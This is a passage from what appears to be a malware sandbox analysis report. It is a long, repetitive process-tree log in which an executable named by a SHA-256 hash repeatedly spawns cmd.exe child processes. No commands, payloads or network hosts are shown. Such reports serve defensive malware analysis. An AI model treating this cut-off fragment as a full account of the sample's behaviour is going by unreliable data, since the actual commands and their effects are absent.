memory of 1852 828 cmd.exe 866 PID 828 wrote to memory of 1852 828 cmd.exe 866 PID 828 wrote to memory of 1852 828 cmd.exe 866 PID 828 wrote to memory of 1820 828 cmd.exe 867 PID 828 wrote to memory of 1820 828 cmd.exe 867 PID 828 wrote to memory of 1820 828 cmd.exe 867 PID 828 wrote to memory of 1820 828 cmd.exe 867 PID 828 wrote to memory of 992 828 cmd.exe 868 PID 828 wrote to memory of 992 828 cmd.exe 868 PID 828 wrote to memory of 992 828 cmd.exe 868 PID 828 wrote to memory of 992 828 cmd.exe 868 PID 992 wrote to memory of 1624 992 cmd.exe 869 PID 992 wrote to memory of 1624 992 cmd.exe 869 PID 992 wrote to memory of 1624 992 cmd.exe 869 PID 992 wrote to memory of 1624 992 cmd.exe 869 PID 828 wrote to memory of 1264 828 cmd.exe 870 PID 828 wrote to memory of 1264 828 cmd.exe 870 PID 828 wrote to memory of 1264 828 cmd.exe 870 PID 828 wrote to memory of 1264 828 cmd.exe 870 PID 1460 wrote to memory of 1380 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 871 PID 1460 wrote to memory of 1380 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 871 PID 1460 wrote to memory of 1380 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 871 PID 1460 wrote to memory of 1380 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 871 PID 1380 wrote to memory of 1876 1380 cmd.exe 873 PID 1380 wrote to memory of 1876 1380 cmd.exe 873 PID 1380 wrote to memory of 1876 1380 cmd.exe 873 PID 1380 wrote to memory of 1876 1380 cmd.exe 873 PID 1380 wrote to memory of 1692 1380 cmd.exe 874 PID 1380 wrote to memory of 1692 1380 cmd.exe 874 PID 1380 wrote to memory of 1692 1380 cmd.exe 874 PID 1380 wrote to memory of 1692 1380 cmd.exe 874 PID 1380 wrote to memory of 1536 1380 cmd.exe 875 PID 1380 wrote to memory of 1536 1380 cmd.exe 875 PID 1380 wrote to memory of 1536 1380 cmd.exe 875 PID 1380 wrote to memory of 1536 1380 cmd.exe 875 PID 1536 wrote to memory of 396 1536 cmd.exe 876 PID 1536 wrote to memory of 396 1536 cmd.exe 876 PID 1536 wrote to memory of 396 1536 cmd.exe 876 PID 1536 wrote to memory of 396 1536 cmd.exe 876 PID 1380 wrote to memory of 1572 1380 cmd.exe 877 PID 1380 wrote to memory of 1572 1380 cmd.exe 877 PID 1380 wrote to memory of 1572 1380 cmd.exe 877 PID 1380 wrote to memory of 1572 1380 cmd.exe 877 PID 1460 wrote to memory of 1908 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 878 PID 1460 wrote to memory of 1908 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 878 PID 1460 wrote to memory of 1908 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 878 PID 1460 wrote to memory of 1908 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 878 PID 1908 wrote to memory of 1800 1908 cmd.exe 880 PID 1908 wrote to memory of 1800 1908 cmd.exe 880 PID 1908 wrote to memory of 1800 1908 cmd.exe 880 PID 1908 wrote to memory of 1800 1908 cmd.exe 880 PID 1908 wrote to memory of 1316 1908 cmd.exe 881 PID 1908 wrote to memory of 1316 1908 cmd.exe 881 PID 1908 wrote to memory of 1316 1908 cmd.exe 881 PID 1908 wrote to memory of 1316 1908 cmd.exe 881 PID 1908 wrote to memory of 780 1908 cmd.exe 882 PID 1908 wrote to memory of 780 1908 cmd.exe 882 PID 1908 wrote to memory of 780 1908 cmd.exe 882 PID 1908 wrote to memory of 780 1908 cmd.exe 882 PID 780 wrote to memory of 1912 780 cmd.exe 883 PID 780 wrote to memory of 1912 780 cmd.exe 883 PID 780 wrote to memory of 1912 780 cmd.exe 883 PID 780 wrote to memory of 1912 780 cmd.exe 883 PID 1908 wrote to memory of 904 1908 cmd.exe 884 PID 1908 wrote to memory of 904 1908 cmd.exe 884 PID 1908 wrote to memory of 904 1908 cmd.exe 884 PID 1908 wrote to memory of 904 1908 cmd.exe 884 PID 1460 wrote to memory of 1756 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 885 PID 1460 wrote to memory of 1756 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 885 PID 1460 wrote to memory of 1756 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 885 PID 1460 wrote to memory of 1756 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 885 PID 1756 wrote to memory of 432 1756 cmd.exe 887 PID 1756 wrote to memory of 432 1756 cmd.exe 887 PID 1756 wrote to memory of 432 1756 cmd.exe 887 PID 1756 wrote to memory of 432 1756 cmd.exe 887 PID 1756 wrote to memory of 208 1756 cmd.exe 888 PID 1756 wrote to memory of 208 1756 cmd.exe 888 PID 1756 wrote to memory of 208 1756 cmd.exe 888 PID 1756 wrote to memory of 208 1756 cmd.exe 888 PID 1756 wrote to memory of 1264 1756 cmd.exe 889 PID 1756 wrote to memory of 1264 1756 cmd.exe 889 PID 1756 wrote to memory of 1264 1756 cmd.exe 889 PID 1756 wrote to memory of 1264 1756 cmd.exe 889 PID 1264 wrote to memory of 828 1264 cmd.exe 890 PID 1264 wrote to memory of 828 1264 cmd.exe 890 PID 1264 wrote to memory of 828 1264 cmd.exe 890 PID 1264 wrote to memory of 828 1264 cmd.exe 890 PID 1756 wrote to memory of 940 1756 cmd.exe 891 PID 1756 wrote to memory of 940 1756 cmd.exe 891 PID 1756 wrote to memory of 940 1756 cmd.exe 891 PID 1756 wrote to memory of 940 1756 cmd.exe 891 PID 1460 wrote to memory of 880 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 892 PID 1460 wrote to memory of 880 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 892 PID 1460 wrote to memory of 880 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 892 PID 1460 wrote to memory of 880 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 892 PID 880 wrote to memory of 556 880 cmd.exe 894 PID 880 wrote to memory of 556 880 cmd.exe 894 PID 880 wrote to memory of 556 880 cmd.exe 894 PID 880 wrote to memory of 556 880 cmd.exe 894 PID 880 wrote to memory of 832 880 cmd.exe 895 PID 880 wrote to memory of 832 880 cmd.exe 895 PID 880 wrote to memory of 832 880 cmd.exe 895 PID 880 wrote to memory of 832 880 cmd.exe 895 PID 880 wrote to memory of 1572 880 cmd.exe 896 PID 880 wrote to memory of 1572 880 cmd.exe 896 PID 880 wrote to memory of 1572 880 cmd.exe 896 PID 880 wrote to memory of 1572 880 cmd.exe 896 PID 1572 wrote to memory of 1380 1572 cmd.exe 897 PID 1572 wrote to memory of 1380 1572 cmd.exe 897 PID 1572 wrote to memory of 1380 1572 cmd.exe 897 PID 1572 wrote to memory of 1380 1572 cmd.exe 897 PID 880 wrote to memory of 1496 880 cmd.exe 898 PID 880 wrote to memory of 1496 880 cmd.exe 898 PID 880 wrote to memory of 1496 880 cmd.exe 898 PID 880 wrote to memory of 1496 880 cmd.exe 898 PID 1460 wrote to memory of 952 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 899 PID 1460 wrote to memory of 952 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 899 PID 1460 wrote to memory of 952 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 899 PID 1460 wrote to memory of 952 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 899 PID 952 wrote to memory of 1916 952 cmd.exe 901 PID 952 wrote to memory of 1916 952 cmd.exe 901 PID 952 wrote to memory of 1916 952 cmd.exe 901 PID 952 wrote to memory of 1916 952 cmd.exe 901 PID 952 wrote to memory of 1000 952 cmd.exe 902 PID 952 wrote to memory of 1000 952 cmd.exe 902 PID 952 wrote to memory of 1000 952 cmd.exe 902 PID 952 wrote to memory of 1000 952 cmd.exe 902 PID 952 wrote to memory of 1796 952 cmd.exe 903 PID 952 wrote to memory of 1796 952 cmd.exe 903 PID 952 wrote to memory of 1796 952 cmd.exe 903 PID 952 wrote to memory of 1796 952 cmd.exe 903 PID 1796 wrote to memory of 1696 1796 cmd.exe 904 PID 1796 wrote to memory of 1696 1796 cmd.exe 904 PID 1796 wrote to memory of 1696 1796 cmd.exe 904 PID 1796 wrote to memory of 1696 1796 cmd.exe 904 PID 952 wrote to memory of 1568 952 cmd.exe 905 PID 952 wrote to memory of 1568 952 cmd.exe 905 PID 952 wrote to memory of 1568 952 cmd.exe 905 PID 952 wrote to memory of 1568 952 cmd.exe 905 PID 1460 wrote to memory of 1780 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 906 PID 1460 wrote to memory of 1780 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 906 PID 1460 wrote to memory of 1780 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 906 PID 1460 wrote to memory of 1780 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 906 PID 1780 wrote to memory of 1920 1780 cmd.exe 908 PID 1780 wrote to memory of 1920 1780 cmd.exe 908 PID 1780 wrote to memory of 1920 1780 cmd.exe 908 PID 1780 wrote to memory of 1920 1780 cmd.exe 908 PID 1780 wrote to memory of 1992 1780 cmd.exe 909 PID 1780 wrote to memory of 1992 1780 cmd.exe 909 PID 1780 wrote to memory of 1992 1780 cmd.exe 909 PID 1780 wrote to memory of 1992 1780 cmd.exe 909 PID 1780 wrote to memory of 940 1780 cmd.exe 910 PID 1780 wrote to memory of 940 1780 cmd.exe 910 PID 1780 wrote to memory of 940 1780 cmd.exe 910 PID 1780 wrote to memory of 940 1780 cmd.exe 910 PID 940 wrote to memory of 1756 940 cmd.exe 911 PID 940 wrote to memory of 1756 940 cmd.exe 911 PID 940 wrote to memory of 1756 940 cmd.exe 911 PID 940 wrote to memory of 1756 940 cmd.exe 911 PID 1780 wrote to memory of 896 1780 cmd.exe 912 PID 1780 wrote to memory of 896 1780 cmd.exe 912 PID 1780 wrote to memory of 896 1780 cmd.exe 912 PID 1780 wrote to memory of 896 1780 cmd.exe 912 PID 1460 wrote to memory of 336 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 913 PID 1460 wrote to memory of 336 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 913 PID 1460 wrote to memory of 336 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 913 PID 1460 wrote to memory of 336 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 913 PID 336 wrote to memory of 800 336 cmd.exe 915 PID 336 wrote to memory of 800 336 cmd.exe 915 PID 336 wrote to memory of 800 336 cmd.exe 915 PID 336 wrote to memory of 800 336 cmd.exe 915 PID 336 wrote to memory of 1988 336 cmd.exe 916 PID 336 wrote to memory of 1988 336 cmd.exe 916 PID 336 wrote to memory of 1988 336 cmd.exe 916 PID 336 wrote to memory of 1988 336 cmd.exe 916 PID 336 wrote to memory of 304 336 cmd.exe 917 PID 336 wrote to memory of 304 336 cmd.exe 917 PID 336 wrote to memory of 304 336 cmd.exe 917 PID 336 wrote to memory of 304 336 cmd.exe 917 PID 304 wrote to memory of 1692 304 cmd.exe 918 PID 304 wrote to memory of 1692 304 cmd.exe 918 PID 304 wrote to memory of 1692 304 cmd.exe 918 PID 304 wrote to memory of 1692 304 cmd.exe 918 PID 336 wrote to memory of 1596 336 cmd.exe 919 PID 336 wrote to memory of 1596 336 cmd.exe 919 PID 336 wrote to memory of 1596 336 cmd.exe 919 PID 336 wrote to memory of 1596 336 cmd.exe 919 PID 1460 wrote to memory of 1864 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 920 PID 1460 wrote to memory of 1864 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 920 PID 1460 wrote to memory of 1864 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 920 PID 1460 wrote to memory of 1864 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 920 PID 1864 wrote to memory of 744 1864 cmd.exe 922 PID 1864 wrote to memory of 744 1864 cmd.exe 922 PID 1864 wrote to memory of 744 1864 cmd.exe 922 PID 1864 wrote to memory of 744 1864 cmd.exe 922 PID 1864 wrote to memory of 956 1864 cmd.exe 923 PID 1864 wrote to memory of 956 1864 cmd.exe 923 PID 1864 wrote to memory of 956 1864 cmd.exe 923 PID 1864 wrote to memory of 956 1864 cmd.exe 923 PID 1864 wrote to memory of 1568 1864 cmd.exe 924 PID 1864 wrote to memory of 1568 1864 cmd.exe 924 PID 1864 wrote to memory of 1568 1864 cmd.exe 924 PID 1864 wrote to memory of 1568 1864 cmd.exe 924 PID 1568 wrote to memory of 952 1568 cmd.exe 925 PID 1568 wrote to memory of 952 1568 cmd.exe 925 PID 1568 wrote to memory of 952 1568 cmd.exe 925 PID 1568 wrote to memory of 952 1568 cmd.exe 925 PID 1864 wrote to memory of 320 1864 cmd.exe 926 PID 1864 wrote to memory of 320 1864 cmd.exe 926 PID 1864 wrote to memory of 320 1864 cmd.exe 926 PID 1864 wrote to memory of 320 1864 cmd.exe 926 PID 1460 wrote to memory of 1752 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 927 PID 1460 wrote to memory of 1752 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 927 PID 1460 wrote to memory of 1752 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 927 PID 1460 wrote to memory of 1752 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 927 PID 1752 wrote to memory of 816 1752 cmd.exe 929 PID 1752 wrote to memory of 816 1752 cmd.exe 929 PID 1752 wrote to memory of 816 1752 cmd.exe 929 PID 1752 wrote to memory of 816 1752 cmd.exe 929 PID 1752 wrote to memory of 968 1752 cmd.exe 930 PID 1752 wrote to memory of 968 1752 cmd.exe 930 PID 1752 wrote to memory of 968 1752 cmd.exe 930 PID 1752 wrote to memory of 968 1752 cmd.exe 930 PID 1752 wrote to memory of 824 1752 cmd.exe 931 PID 1752 wrote to memory of 824 1752 cmd.exe 931 PID 1752 wrote to memory of 824 1752 cmd.exe 931 PID 1752 wrote to memory of 824 1752 cmd.exe 931 PID 824 wrote to memory of 1224 824 cmd.exe 932 PID 824 wrote to memory of 1224 824 cmd.exe 932 PID 824 wrote to memory of 1224 824 cmd.exe 932 PID 824 wrote to memory of 1224 824 cmd.exe 932 PID 1752 wrote to memory of 1380 1752 cmd.exe 933 PID 1752 wrote to memory of 1380 1752 cmd.exe 933 PID 1752 wrote to memory of 1380 1752 cmd.exe 933 PID 1752 wrote to memory of 1380 1752 cmd.exe 933 PID 1460 wrote to memory of 1800 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 934 PID 1460 wrote to memory of 1800 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 934 PID 1460 wrote to memory of 1800 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 934 PID 1460 wrote to memory of 1800 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 934 PID 1800 wrote to memory of 1692 1800 cmd.exe 936 PID 1800 wrote to memory of 1692 1800 cmd.exe 936 PID 1800 wrote to memory of 1692 1800 cmd.exe 936 PID 1800 wrote to memory of 1692 1800 cmd.exe 936 PID 1800 wrote to memory of 1912 1800 cmd.exe 937 PID 1800 wrote to memory of 1912 1800 cmd.exe 937 PID 1800 wrote to memory of 1912 1800 cmd.exe 937 PID 1800 wrote to memory of 1912 1800 cmd.exe 937 PID 1800 wrote to memory of 1836 1800 cmd.exe 938 PID 1800 wrote to memory of 1836 1800 cmd.exe 938 PID 1800 wrote to memory of 1836 1800 cmd.exe 938 PID 1800 wrote to memory of 1836 1800 cmd.exe 938 PID 1836 wrote to memory of 1284 1836 cmd.exe 939 PID 1836 wrote to memory of 1284 1836 cmd.exe 939 PID 1836 wrote to memory of 1284 1836 cmd.exe 939 PID 1836 wrote to memory of 1284 1836 cmd.exe 939 PID 1800 wrote to memory of 1796 1800 cmd.exe 940 PID 1800 wrote to memory of 1796 1800 cmd.exe 940 PID 1800 wrote to memory of 1796 1800 cmd.exe 940 PID 1800 wrote to memory of 1796 1800 cmd.exe 940 PID 1460 wrote to memory of 956 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 941 PID 1460 wrote to memory of 956 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 941 PID 1460 wrote to memory of 956 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 941 PID 1460 wrote to memory of 956 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 941 PID 956 wrote to memory of 216 956 cmd.exe 943 PID 956 wrote to memory of 216 956 cmd.exe 943 PID 956 wrote to memory of 216 956 cmd.exe 943 PID 956 wrote to memory of 216 956 cmd.exe 943 PID 956 wrote to memory of 1920 956 cmd.exe 944 PID 956 wrote to memory of 1920 956 cmd.exe 944 PID 956 wrote to memory of 1920 956 cmd.exe 944 PID 956 wrote to memory of 1920 956 cmd.exe 944 PID 956 wrote to memory of 1852 956 cmd.exe 945 PID 956 wrote to memory of 1852 956 cmd.exe 945 PID 956 wrote to memory of 1852 956 cmd.exe 945 PID 956 wrote to memory of 1852 956 cmd.exe 945 PID 1852 wrote to memory of 1812 1852 cmd.exe 946 PID 1852 wrote to memory of 1812 1852 cmd.exe 946 PID 1852 wrote to memory of 1812 1852 cmd.exe 946 PID 1852 wrote to memory of 1812 1852 cmd.exe 946 PID 956 wrote to memory of 1756 956 cmd.exe 947 PID 956 wrote to memory of 1756 956 cmd.exe 947 PID 956 wrote to memory of 1756 956 cmd.exe 947 PID 956 wrote to memory of 1756 956 cmd.exe 947 PID 1460 wrote to memory of 968 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 948 PID 1460 wrote to memory of 968 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 948 PID 1460 wrote to memory of 968 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 948 PID 1460 wrote to memory of 968 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 948 PID 968 wrote to memory of 1224 968 cmd.exe 950 PID 968 wrote to memory of 1224 968 cmd.exe 950 PID 968 wrote to memory of 1224 968 cmd.exe 950 PID 968 wrote to memory of 1224 968 cmd.exe 950 PID 968 wrote to memory of 1572 968 cmd.exe 951 PID 968 wrote to memory of 1572 968 cmd.exe 951 PID 968 wrote to memory of 1572 968 cmd.exe 951 PID 968 wrote to memory of 1572 968 cmd.exe 951 PID 968 wrote to memory of 1624 968 cmd.exe 952 PID 968 wrote to memory of 1624 968 cmd.exe 952 PID 968 wrote to memory of 1624 968 cmd.exe 952 PID 968 wrote to memory of 1624 968 cmd.exe 952 PID 1624 wrote to memory of 1144 1624 cmd.exe 953 PID 1624 wrote to memory of 1144 1624 cmd.exe 953 PID 1624 wrote to memory of 1144 1624 cmd.exe 953 PID 1624 wrote to memory of 1144 1624 cmd.exe 953 PID 968 wrote to memory of 1692 968 cmd.exe 954 PID 968 wrote to memory of 1692 968 cmd.exe 954 PID 968 wrote to memory of 1692 968 cmd.exe 954 PID 968 wrote to memory of 1692 968 cmd.exe 954 PID 1460 wrote to memory of 1916 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 955 PID 1460 wrote to memory of 1916 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 955 PID 1460 wrote to memory of 1916 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 955 PID 1460 wrote to memory of 1916 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 955 PID 1916 wrote to memory of 1836 1916 cmd.exe 957 PID 1916 wrote to memory of 1836 1916 cmd.exe 957 PID 1916 wrote to memory of 1836 1916 cmd.exe 957 PID 1916 wrote to memory of 1836 1916 cmd.exe 957 PID 1916 wrote to memory of 1696 1916 cmd.exe 958 PID 1916 wrote to memory of 1696 1916 cmd.exe 958 PID 1916 wrote to memory of 1696 1916 cmd.exe 958 PID 1916 wrote to memory of 1696 1916 cmd.exe 958 PID 1916 wrote to memory of 592 1916 cmd.exe 959 PID 1916 wrote to memory of 592 1916 cmd.exe 959 PID 1916 wrote to memory of 592 1916 cmd.exe 959 PID 1916 wrote to memory of 592 1916 cmd.exe 959 PID 592 wrote to memory of 1824 592 cmd.exe 960 PID 592 wrote to memory of 1824 592 cmd.exe 960 PID 592 wrote to memory of 1824 592 cmd.exe 960 PID 592 wrote to memory of 1824 592 cmd.exe 960 PID 1916 wrote to memory of 216 1916 cmd.exe 961 PID 1916 wrote to memory of 216 1916 cmd.exe 961 PID 1916 wrote to memory of 216 1916 cmd.exe 961 PID 1916 wrote to memory of 216 1916 cmd.exe 961 PID 1460 wrote to memory of 1908 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 962 PID 1460 wrote to memory of 1908 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 962 PID 1460 wrote to memory of 1908 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 962 PID 1460 wrote to memory of 1908 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 962 PID 1908 wrote to memory of 1852 1908 cmd.exe 964 PID 1908 wrote to memory of 1852 1908 cmd.exe 964 PID 1908 wrote to memory of 1852 1908 cmd.exe 964 PID 1908 wrote to memory of 1852 1908 cmd.exe 964 PID 1908 wrote to memory of 816 1908 cmd.exe 965 PID 1908 wrote to memory of 816 1908 cmd.exe 965 PID 1908 wrote to memory of 816 1908 cmd.exe 965 PID 1908 wrote to memory of 816 1908 cmd.exe 965 PID 1908 wrote to memory of 956 1908 cmd.exe 966 PID 1908 wrote to memory of 956 1908 cmd.exe 966 PID 1908 wrote to memory of 956 1908 cmd.exe 966 PID 1908 wrote to memory of 956 1908 cmd.exe 966 PID 956 wrote to memory of 556 956 cmd.exe 967 PID 956 wrote to memory of 556 956 cmd.exe 967 PID 956 wrote to memory of 556 956 cmd.exe 967 PID 956 wrote to memory of 556 956 cmd.exe 967 PID 1908 wrote to memory of 1224 1908 cmd.exe 968 PID 1908 wrote to memory of 1224 1908 cmd.exe 968 PID 1908 wrote to memory of 1224 1908 cmd.exe 968 PID 1908 wrote to memory of 1224 1908 cmd.exe 968 PID 1460 wrote to memory of 1752 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 969 PID 1460 wrote to memory of 1752 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 969 PID 1460 wrote to memory of 1752 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 969 PID 1460 wrote to memory of 1752 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 969 PID 1752 wrote to memory of 1624 1752 cmd.exe 971 PID 1752 wrote to memory of 1624 1752 cmd.exe 971 PID 1752 wrote to memory of 1624 1752 cmd.exe 971 PID 1752 wrote to memory of 1624 1752 cmd.exe 971 PID 1752 wrote to memory of 1596 1752 cmd.exe 972 PID 1752 wrote to memory of 1596 1752 cmd.exe 972 PID 1752 wrote to memory of 1596 1752 cmd.exe 972 PID 1752 wrote to memory of 1596 1752 cmd.exe 972 PID 1752 wrote to memory of 204 1752 cmd.exe 973 PID 1752 wrote to memory of 204 1752 cmd.exe 973 PID 1752 wrote to memory of 204 1752 cmd.exe 973 PID 1752 wrote to memory of 204 1752 cmd.exe 973 PID 204 wrote to memory of 968 204 cmd.exe 974 PID 204 wrote to memory of 968 204 cmd.exe 974 PID 204 wrote to memory of 968 204 cmd.exe 974 PID 204 wrote to memory of 968 204 cmd.exe 974 PID 1752 wrote to memory of 1836 1752 cmd.exe 975 PID 1752 wrote to memory of 1836 1752 cmd.exe 975 PID 1752 wrote to memory of 1836 1752 cmd.exe 975 PID 1752 wrote to memory of 1836 1752 cmd.exe 975 PID 1460 wrote to memory of 1696 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 976 PID 1460 wrote to memory of 1696 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 976 PID 1460 wrote to memory of 1696 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 976 PID 1460 wrote to memory of 1696 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 976 PID 1696 wrote to memory of 1988 1696 cmd.exe 978 PID 1696 wrote to memory of 1988 1696 cmd.exe 978 PID 1696 wrote to memory of 1988 1696 cmd.exe 978 PID 1696 wrote to memory of 1988 1696 cmd.exe 978 PID 1696 wrote to memory of 1920 1696 cmd.exe 979 PID 1696 wrote to memory of 1920 1696 cmd.exe 979 PID 1696 wrote to memory of 1920 1696 cmd.exe 979 PID 1696 wrote to memory of 1920 1696 cmd.exe 979 PID 1696 wrote to memory of 1284 1696 cmd.exe 980 PID 1696 wrote to memory of 1284 1696 cmd.exe 980 PID 1696 wrote to memory of 1284 1696 cmd.exe 980 PID 1696 wrote to memory of 1284 1696 cmd.exe 980 PID 1284 wrote to memory of 1000 1284 cmd.exe 981 PID 1284 wrote to memory of 1000 1284 cmd.exe 981 PID 1284 wrote to memory of 1000 1284 cmd.exe 981 PID 1284 wrote to memory of 1000 1284 cmd.exe 981 PID 1696 wrote to memory of 396 1696 cmd.exe 982 PID 1696 wrote to memory of 396 1696 cmd.exe 982 PID 1696 wrote to memory of 396 1696 cmd.exe 982 PID 1696 wrote to memory of 396 1696 cmd.exe 982 PID 1460 wrote to memory of 1256 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 983 PID 1460 wrote to memory of 1256 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 983 PID 1460 wrote to memory of 1256 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 983 PID 1460 wrote to memory of 1256 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 983 PID 1256 wrote to memory of 432 1256 cmd.exe 985 PID 1256 wrote to memory of 432 1256 cmd.exe 985 PID 1256 wrote to memory of 432 1256 cmd.exe 985 PID 1256 wrote to memory of 432 1256 cmd.exe 985 PID 1256 wrote to memory of 560 1256 cmd.exe 986 PID 1256 wrote to memory of 560 1256 cmd.exe 986 PID 1256 wrote to memory of 560 1256 cmd.exe 986 PID 1256 wrote to memory of 560 1256 cmd.exe 986 PID 1256 wrote to memory of 1224 1256 cmd.exe 987 PID 1256 wrote to memory of 1224 1256 cmd.exe 987 PID 1256 wrote to memory of 1224 1256 cmd.exe 987 PID 1256 wrote to memory of 1224 1256 cmd.exe 987 PID 1224 wrote to memory of 940 1224 cmd.exe 988 PID 1224 wrote to memory of 940 1224 cmd.exe 988 PID 1224 wrote to memory of 940 1224 cmd.exe 988 PID 1224 wrote to memory of 940 1224 cmd.exe 988 PID 1256 wrote to memory of 1228 1256 cmd.exe 989 PID 1256 wrote to memory of 1228 1256 cmd.exe 989 PID 1256 wrote to memory of 1228 1256 cmd.exe 989 PID 1256 wrote to memory of 1228 1256 cmd.exe 989 PID 1460 wrote to memory of 1692 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 990 PID 1460 wrote to memory of 1692 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 990 PID 1460 wrote to memory of 1692 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 990 PID 1460 wrote to memory of 1692 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 990 PID 1692 wrote to memory of 832 1692 cmd.exe 992 PID 1692 wrote to memory of 832 1692 cmd.exe 992 PID 1692 wrote to memory of 832 1692 cmd.exe 992 PID 1692 wrote to memory of 832 1692 cmd.exe 992 PID 1692 wrote to memory of 1316 1692 cmd.exe 993 PID 1692 wrote to memory of 1316 1692 cmd.exe 993 PID 1692 wrote 